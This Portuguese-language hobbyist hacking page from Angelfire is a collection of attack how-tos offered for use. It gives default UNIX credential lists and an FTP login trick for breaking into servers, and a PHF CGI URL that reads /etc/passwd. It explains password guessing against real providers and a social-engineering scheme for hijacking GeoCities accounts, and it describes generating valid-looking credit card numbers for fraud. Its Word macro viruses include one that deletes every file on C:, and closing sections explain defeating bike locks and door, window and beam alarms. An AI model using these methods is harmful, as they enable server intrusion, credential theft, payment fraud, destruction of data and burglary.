Site hosted by Angelfire.com: Build your free website today!

Tommy's Page

Manual do FTP

INVASÃO DE SERVIDOR DE FTP

  • Ataque por FTP

    Para Hackear um Servidor FTP, Primeiro vc deve saber o indereço do Host ou seu IP, para isto use o IPSCAN ou outro programa qualquer de IP.

    Lista de Alguns FTP's:

    ftp.mandic.com.br
    ftp.bestway.com.br
    ftp.internetclub.com.br(HACKEADO)
    ftp.netscape.com
    ftp.angelfire.com

    Existem varios Programas de FTP'S, no Windows vem um programa de FTP. Va ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br.

    Ao conectar ele pedirá a senha e o Password, tente usar os passwords UNIX, aí vai os passwords do UNIX, se não der você deve tentar entrar INVISIVEL:

    Login:
    Password:
    root
    root
    root
    system
    sys
    sys
    sys
    system
    daemon
    daemon
    uucp
    uucp
    tty
    tty
    test
    test
    unix
    unix
    unix
    test
    sysadmin
    sys
    sysadmin
    system
    sysadmin
    admin
    sysadmin
    adm
    who
    who
    learn
    learn
    uuhost
    uuhost
    guest
    guest
    host
    host
    nuucp
    nuucp
    rje
    rje

  • Para entrar Invisivel:

    No login precione ENTER, no password precione ENTER novamente...

    Ira aparecer o prompt ftp> ai é só digitar:

    quote user ftp , precione ENTER e digite:

    quote cwd ~root

    Precione ENTER novamente e digite:

    quote pass ftp

    Pronto, vc esta Hackeando invisivel...
    Mas tem um porem..., se quando você entrar aparecer a mensagem: user restriction aplly, vc não esta Hackeando, pois esta aplicada a proteção... para isto tente com outro USER tipo:

    quote cwd ~sys e os outros da lista UNIX (acima)

    ATENÇÃO!!!!
    Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e password: seu E-Mail, pois vai ser aplicado a proteção....
    Ao entrar vc vai estar no diretório do login, tipo \home\root\
    Daí você entra no diretório /etc (cd etc) e pegue o arquivo PASSWD (get passwd), ele contém as senhas doas usuarios, estão todas criptografadas, mas existe prgramas com o Jack que conseguem descriptografar através do metodo de comparação, o Jack pega uma Worlist (arquivo palavras mais usadas como senha), criptografa ela com as instruções do passwd e compara, os resultados são gravados em um arquivo.

    O arquivo de senhas podem estar em vários diretórios, dependendo do tipo de UNIX, olhe a lista abaixo:

    UNIX:
    Diretório:
    AIX 3
    /etc/security/passwd
    /tcb/auth/files//
    A/UX 3.Os
    /tcb/files/auth/?
    BSD4.3-Reno
    /etc/master.passwd
    ConvexOS 10
    /etc/shadpw
    Convex0S 11
    /etc/shadow
    DG/UX
    /etc/tcb/aa/user
    EP/IX
    /etc/shadow
    HP-UX
    /.secure/etc/passwd
    IRIX 5
    /etc/shadow
    Linux 1.1
    /etc/shadow
    OSF/1
    /etc/passwd[.dir|.pag]
    SCO Unix #.2.x
    /tcb/auth/files/
    SunOS 4.1+c2
    /etc/security/passwd.adjunct
    SunOS 5.0
    /etc/shadow
    System V 4.0
    /etc/shadow
    System V 4.2
    /etc/security/database
    Ultrix 4
    /etc/auth[.dir|.pag]
    UNICOS
    /etc/udb

    Bom... se vc não sabe os comandos, ai vai a dica...., se vc estiver no MS-DOS, digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear.

    Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e pode dá cadeia.
    Não me responsabilizo por atos cometidos nos servidores... o problema é de quem Hackeia, e não meu, tome muito cuidado, e NUNCA, mas NUNCA apague NADA....

    COMO HACKEAR A GEOCITIES

    Entrei na página de poucas pessoas e pensei pq até hoje não ouvi falar de alguém que tenha hackeado uma página dessa?? Se tem alguem realmente não ouvi falar!
    Então olhei por dentro a página do FILE MANAGER na Geocities e tentei descobrir alguma relação entre a minha senha e a porrada de números e letras que aparecem ali; não encontrei relação nenhuma:) Mas aconselho a continuarem tentando, coisa q eu ainda to fazendo! E olhando a página de uma pessoa por dentro vi o counter da Geocities ali dentro com o membername(lógico q todas tem),e pensei na maneira mais ridícula de pegar a senha do cara.
    Eu não esperava encontrar profissionais tão imbecis lá, mas eles existem sim.

    -.- DIRETO AO ASSUNTO -.-

    1- Anote o membername da página dando um source!

    2- Anote o lugar em que essa pagina esta.
    ex: http://www.geocities.com/Augusta/2000/
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

    Logicamente vc só vai anotar o diretório e o block!

    3- Agora vá até a página principal da Geocities e clique no link CONTACT GEOCITIES do lado esquerdo (pode ter mudado), depois clique em SYSTEM PROBLEMS, e depois em SYSTEM PROBLEMS REPORTING FORM.
    Lá vc vai colocar as informações necessárias, o diretório(acima citado) o block, o seu email(aconselho a fazer o forward) e no espaço abaixo vc vai colocar o problema, diga que ainda não recebeu sua senha(em inglês "I haven't recive my password, could you send me.)

    4- Porra como e ridiculo né? Agora e so esperar em 3 ou 4 dias no máximo chega sua senha!

    Obx: É mais facil de receber a senha se a home page que vc for hackear for nova(no máximo 2 meses) se passar disso já fica muito díficil de receber a resposta!

    Fique tranquilo eles são muito atarefados pra verificarem se e vc mesmo, quase 100% de chance de receber o email e não acontecer nada com vc!

    COMO DESCOBRIR SENHAS DE TRANCAS DE BIKES

    Isso e muito simples e bastante eficaz:

    1- Tem que ser uma tranca desse modelo (eu nunca testei com outro)
    _______
    | _ |
    |_| | |
    ___|_|
    | |
    | 1 2 |
    | 3 4 |
    | 5 6 |
    | 7 8 |
    | 9 0 |
    |_____|
    | |
    ",,,,,

    2- Pegue na parte onde tem os números e na que a outra parte que coloca a corrente e force para os lados como se quisesse abrir, quando estiver forçando, aperte todos os números com força, até que todos se abaixem o máximo que possa conseguir... depois olhe os que estiverem mais altos, pois eles que são a senha...

    Muito Fácil !!!! Não?

    Caso testem em outros modelos e tiverem hesito, me informem

    ATAQUE VIA BROWER

    O ataque via browser é um dos ataques mais faceis de executar, mas não da nem 50% de sucessos nos ataques.
    Vou tentar explicar como você usa esse metódo:

    Primeiramente você tem que entender o que está fazendo, não adianta selecionar a dica
    aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:

    Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados , existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuarios é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser:

    http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

    Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.

    Ex.: http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

    Bom, mas se você usar um pouco a cabeça vai ver que para que não de nada errado e você pode
    usar o anonymizer, bom não é certeza que dá pra usar não porque eu nunca tentei, mas pela lógica dá.

    O QUE SÃO JOKEFILES ?

    Esses arquivos, conhecido como brinquedinhos de lammers, sempre fazem uma piadinha e simula a reiniciação de seu pc ou a formatação de seu HD (oh! não!!).... o kra se caga todo!!

    COMO PEGAR SENHAS PIRATAS

  • Pegando senhas

    Existem vários meios de se obter senhas de acessos. Os mais comuns estão listados abaixo.

  • Cavalo de Tróia

    O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador. Farejamento de redes.
    Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.

  • Engenharia social

    É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.

  • Quebra-cabeça

    Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.

  • Invasão do servidor

    O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.

  • Dedução

    Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:

    1. Cerca de 1 em cada 30 usuários usa o login como senha.

    2. Muitos administradores usam a senha padrão do sistema.

    3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain

    Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples.

    Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure
    pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada
    usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário
    é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite
    telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro
    sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que
    suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser
    (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo).
    Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha
    esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas.
    Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain).

    COMO FAZER CC's VÁLIDOS

    Algoritmo para gerar números de cartões de crédito válidos

    Com certeza, toda a gente já ouviu falar nos geradores de números de cartões de crédito!!!Porém muita asneira é dita, acerca deste assunto.

    1) Quando se efectua uma transacção na web, o site "vitima", não verifica, imediatamente, se o cartão tem crédito associado.(alem de que este tipo de informação e confidencial e apenas, instituições bancárias, teem acesso a este tipo de informação).

    2)Um cartão pode ser válido, ou seja, o número ter sido gerado pelo algoritmo correcto, e num entanto, não estar atribuído, ou seja nenhuma entidade bancária, ou financeira o tenha atribuído a um utilizador.

    3)O facto de um cartão não estar atribuído, ao contrário do que se diz, não inviabiliza uma compra...devido ao ponto 1).

    4)Se um gerador, por ventura, gerar um numero atribuído... É PURA COINCIDÊNCIA!!! O sucesso, deste tipo, de falcatrua, é relativo...eu, pessoalmente, nunca tentaria comprar um Rolex, deste modo...porem,...quem resiste a dar uma espreitadela, no bem guardado e bem pago site da Playboy! Claro, que recomendo, ao que pensam em se aventurarem nestes domínios, a darem uma saltada em www.anonymizer.com . Ao que interessa: Um número válido de um Cartão de Crédito (CC), tem 16 algarismos, dos quais os quatro primeiros (chamado prefixo), indicam o código do banco emissor, e o primeiro destes quatro algarismos, indica a rede, onde este cartão é aceite: (um mesmo banco , pode ter mais do que um prefixo, por exemplo, o Totta Matic, é um serviço especial do Banco Totta e Açores, tem um prefixo (4775), diferente dos cartões usuais!).
    3 -> American Express
    4 -> Visa (a mais usada em Portugal)
    5 -> MasterCard
    6 -> Discover (esta rede não e usada em Portugal)
    Como se verifica então que um número é válido?: Por exemplo o cartão... 4938 0723 5791 0411 (rede: Visa ,Banco Pinto & Sotto Mayor). Se pegarmos nos algarismos que ocupam as posições impares no número do CC: 4 3 0 2 5 9 0 1 e apenas nestes, que ocupam posições impares. Agora a esses algarismos multiplica-se 2, se o resultado for maior que 9, dever-se-a subtrair nove a multiplicação...ficara então algo como: 8 6 0 4 1 9 0 2 ..isto então passará, juntando outra vez os algarismos que ocupam as posições pares, para: 8968 0743 1791 0421 agora se a soma de todos os algarismos deste novo número for um múltiplo de 10 e menor do que 150, o número inicial é válido... ex: 8+9+6+8+0+7+4+3+1+7+9+1+0+4+2+1=70, que por sua vez e um múltiplo de 10 e é menor do que 150!!

    Mas, o que nos interessa, e saber como gerar números validos de CC's...para isso e preciso saber muitos bem o algoritmo que testa a sua validade. Para gerar um número, basta apenas escolher o prefixo do banco (independentemente, se e Visa, ou qualquer outra rede): 4938 .... .... ....
    Sabemos então o prefixo, e queremos criar o resto...pois bem, é fácil: Geram-se aleatoriamente, mais 11 algarismos (E NÃO 12!!), e ficamos, por exemplo com o seguinte: 4938 1432 6745 362. Ou seja, o último algarismo permanece, por agora desconhecido... Tal como na função para testar, o processo e semelhante: nos algarismos que ocupam posições impares, multiplicam-se por 2, e os que com esta multiplicação ficarem maiores do que 9, subtrai-se 9 ao resultado, o resultado e este: 8 6 2 6 3 8 6 4. que juntando com os restantes algarismos: 8968 2462 3785 664. A soma total dos algarismos é: 8+9+6+8+2+4+6+2+3+7+8+5+6+6+4=84 Ora, para este numero ser valido, basta que o ultimo algarismo, que ainda não está atribuído seja 6, pois:
    8+9+6+8+2+4+6+2+3+7+8+5+6+6+4=84+6=90 !!!! 90 e menor do que 150 e é múltiplo de 10. Ora cá temos um número gerado, válido!!!!!!!!!!!!!!!!! Para extrapolar números, a partir de porções de outros números, o processo e exactamente o mesmo. Por exemplo, queremos extrapolar números a partir da seguinte porção de um outro número: 4938 452. .... ....
    Geram-se aleatoriamente os restantes números, exceto o último, e pratica-se a já conhecida regra!!!!!!!! Como podem ver, fazer um gerador de números de CC's e simples, apenas requer prática de algoritmia. Já agora ficam aqui também alguns prefixos de bancos portugueses, não inclui bancos estrangeiros, pois qualquer gerador, possui uma lista destes!!! 4775 - Banco Totta & Acores
    (TottaMatic) 4943 - Banco Mello
    4552 - Banco Comercio e Industria
    5901 - Banco Atlantico
    4154 - Nova Rede
    4547 - Banco Fonsecas e Burnay
    5906 - Banco Borges Irmao
    5016 - Banco Nacional Ultramarino
    4407 - Banco Espirito Santo
    4938 - Banco Pinto & Sotto Mayor
    4552 - Banco Internacional de Credito
    4644 - Caixa Geral de Depositos

    FAZENDO VÍRUS DE MACRO

    Ainda hoje existe muita gente que so é capaz de abrir o word, editar, negritar, sublinhar e mandar para impressora, muitos, milhares so sabem mexer no basico mesmo. Eles nem imaginam o que tem por traz deste riquíssimo processador de texto.

    Esta matéria tem como objetivo fazer desde pequenas até grandes sacanagens com usuários pentelhos.

    Obs: Software/versão Abrangido: Word da Microsoft, versões 6 (win3.11) e 7.0 (win95)

    O Word possui um arquivo chamado "normal.dot" onde estão todas as configuracões padrão do word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.

    Níveis de sacanagem

    Nível 1..... Apenas uma brincadeira

    Nível 2..... Apenas uma brincadeira de mau gosto

    Nível 3..... não é mais brincadeira.

  • Primeiro voce precisa criar uma macro... siga os passos:

    Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatório) este macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver la (Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo.

    Obs: existe outras formas/meios de criar uma macro, mas esta é mais simples.

    Nivel 1

    O nivel 1 serve para você se mostrar, falando que entende do Word melhor do que ninguém.

    Cada vez que o usuário inicia o Word recebera uma mensagem... de alerta ou qualquer outro coisa que sair da sua mente. veja abaixo.

    Sub MAIN

    vMsgBox "Voce ‚ um pentelho! Eu nÆo irei prosseguir com o sistema", "Microsoft Word", 5

    MsgBox "Usu rio Pirata Detectado", "FATAL ERROR", 16

    MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64

    End Sub

    Nivel 2

    É para deixar o usuário irritadíssimo.
    No corpo da macro cole este texto abaixo:

    Sub MAIN

    ArquivoNovoPadrão

    Inserir "ESQUISS"

    ArquivoNovoPadrão

    Inserir "ESGOTO"

    ArquivoNovoPadrão

    Inserir "você"

    ArquivoNovoPadrão

    Inserir "é"

    ArquivoNovoPadrão

    Inserir "GAY"

    ArquivoNovoPadrão

    Inserir "ESQUISS ESGOTO você é GAY "

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "."

    ArquivoNovoPadrão

    Inserir "ESQUISS ESGOTO você é GAY "

    End Sub

    Nivel 3

    Bom este nivel é pura sacanagem,com ele um simples clicar* do mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os documentos, voce é quem sabe.

    Sub MAIN

    Kill "C:\*.*"

    Kill "C:\WINDOWS\*.*"

    Kill "C:\WINWORD\*.*"

    End Sub

    Lembre-se de que estes macros, são gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicializacao,então se voce for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'.

    Detalhes:

    Existe uma forma de iniciar o Word, sem q inicialize a macro 'AutoExec' mas eu esqueci. (R$10 reais me ajudariam a lembrar)

    A macro do word é uma ferramenta riquíssima, procure fuçar.

    Voce pode fazer estas no seu próprio computador(só cuide!), salvando sempre no arq. "normal.dot" depois copie apenas este arquivo para aquele seu colega/amigo pentelho e saie de perto, para ele não explodir em você. Não me responsabilizo por qualquer ato.

    VIOLANDO ALARMES

    INTRODUÇÃO

    Todo sistema de alarme necessita de uma central de processamento de sinais, um sistema de aviso para fazer algum tipo de operacao qd a area eh violado ih alguns sensores para fazer a integracao da area violada com a central de pro- cessamento. Componentes básicos para um sistema convencional de alarmes:

    SENSORES
    CIRCUITO CENTRAL
    FONTE / BATERIA SISTEMA
    DE DESARME DE CONTROLE
    CARREGADOR, ETC DE AVISO

  • SENSORES MAGNETICOS

    Os sensores magneticos consistem num interruptor de laminas e um ima, monta- dos em pecas separadas. Muito usados em portas e/ou janelas. Numa instalacao, o interruptor(red-switch) eh q tem ligacao eletrica com o sistema de alarme atraves de fios, e eh posicionado na parte fixa do objeto ih o ima eh fixado na parte movel do objeto.

    Quando o objeto está fechado o ima mantem as laminas do interruptor da parte fixa escostadas uma na outra de modo que o alarme fique desarmado.

    Se o imã for afastado do interruptor de laminas, qd a janela ou porta for aberta, as laminas do interruptor abrem disparando o circuito.

    Então vem aquela pergunta:
    Como Violar ?

    Aguenta q aki vai filhote.

    No estado normal do objeto(fechado), as laminas do interruptor sao mantidas encostadas pelo ima(fixado na parte movel do objeto) do sistema. Qualquer imã (beim potente) externo mantera os contatos fechados, mesmo que o ima original seja removido(abrindo o objeto). Assim o intruso tera q localizar a posicao do sensor antes de tentar uma invazão ih assim podera neutralizar. Olhando pelo lado de fora de uma janela ele podera localizar o sensor ih terah que manter o seu ima nas proximidades. O alarme nao ira disparar mesmo q o ima da janela seja afastado.

    Um outro esquema parecido com esse eh o sistema de alarme para carro(aquele q usa um chaveirinho para ativar/desativar). Neste caso o sensor eh acionado pelo ima carregado num chaveiro de modo a armar e desarmar o alarme. Dae nao eh mais necessario eu falar oq vc teim q fazer neh filhote.

  • SENSORES OPTICOS

    O alarme de interrupcao é o tipo mais comum de alarmes q fax uso de sensores opticos. Este alarme é formado por uma fonte de luz ih um sensor que devem ser posicionados de tal forma que alguem que penetre no local protegido interrompa o feixe de luz.

    Bom dependendo do tipo da fonte de luz o sistema podera ser violado (ou melhor, podera ser enganado). Com a descoberta do sensor(emissor de luz) o intruso podera inibir o sistema simplesmente focalizando uma lanterna.

    Mas essa forma de enganar o alarme somente se aplica aos emissores de luz branca, pois o tipo de luz (luz reta) que eh emitido pela lanterna eh igual ao do emissor de luz do sistema.